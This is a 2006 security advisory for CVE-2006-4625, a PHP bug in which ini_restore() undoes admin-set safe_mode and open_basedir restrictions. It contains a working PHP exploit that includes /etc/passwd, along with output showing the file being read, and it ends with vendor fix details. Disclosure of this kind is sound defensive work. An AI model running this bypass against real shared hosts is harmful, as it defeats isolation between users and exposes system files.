[PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()] Author: Maksymilian Arciemowicz Date: - - Written: 05.09.2006 - - Public: 09.09.2006 CVE: CVE-2006-4625 SecurityRisk: High Affected Software: PHP 5.1.6 / 4.4.4 < = x Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig S&#230;ther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. php_admin_value name value Sets the value of the specified directive. This can not be used in .htaccess files. Any directive type set with php_admin_value can not be overridden by .htaccess or virtualhost directives. To clear a previously set value use none as the value. php_admin_flag name on|off Used to set a boolean configuration directive. This can not be used in .htaccess files. Any directive type set with php_admin_flag can not be overridden by .htaccess or virtualhost directives. http://pl.php.net/manual/en/configuration.changes.php - --- 1. php_admin_value and php_admin_flag Bypass --- When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf). This options are using by a lot of ISP to set open_basedir, safe_mode and more options. For example: open_basedir in httpd.conf - --- <Directory /usr/home/frajer/public_html/> Options FollowSymLinks MultiViews Indexes AllowOverride None php_admin_flag safe_mode 1 php_admin_value open_basedir /usr/home/frajer/public_html/ </Directory> - --- In PHP are two config options. Are Local Value and Master Value. More in phpinfo() or ini_get() Example: If you have safe_mode or open_basedir (etc) set in Local Value for selected users and in Master Value is default value, you can restore Master Value to Local Value per ini_restore() function! - --- ini_restore (PHP 4, PHP 5) ini_restore -- Restores the value of a configuration option - --- Restores the value of a php.ini file. Then your PHP options from httpd.conf are bypassed. EXPLOIT: - --- <? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include("/etc/passwd"); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include("/etc/passwd"); ?> - --- RESULT OF EXPLOIT: - --- 1 /usr/home/frajer/public_html/ Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/usr/home/frajer/public_html/) in /usr/home/frajer/public_html/ini_restore.php on line 4 Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in /usr/home/frajer/public_html/ini_restore.php on line 4 Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in /usr/home/frajer/public_html/ini_restore.php on line 4 # $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag..... - --- This issue is very dangerous, because Admin can't correct set open_basedir or safe_mode for all users. - --- 2. How to fix --- fixed in CVS HEAD, PHP_5_2, PHP_5_1 and PHP_4_4. http://cvs.php.net/viewcvs.cgi/php-src/NEWS - --- 3. Contact --- Author: Maksymilian Arciemowicz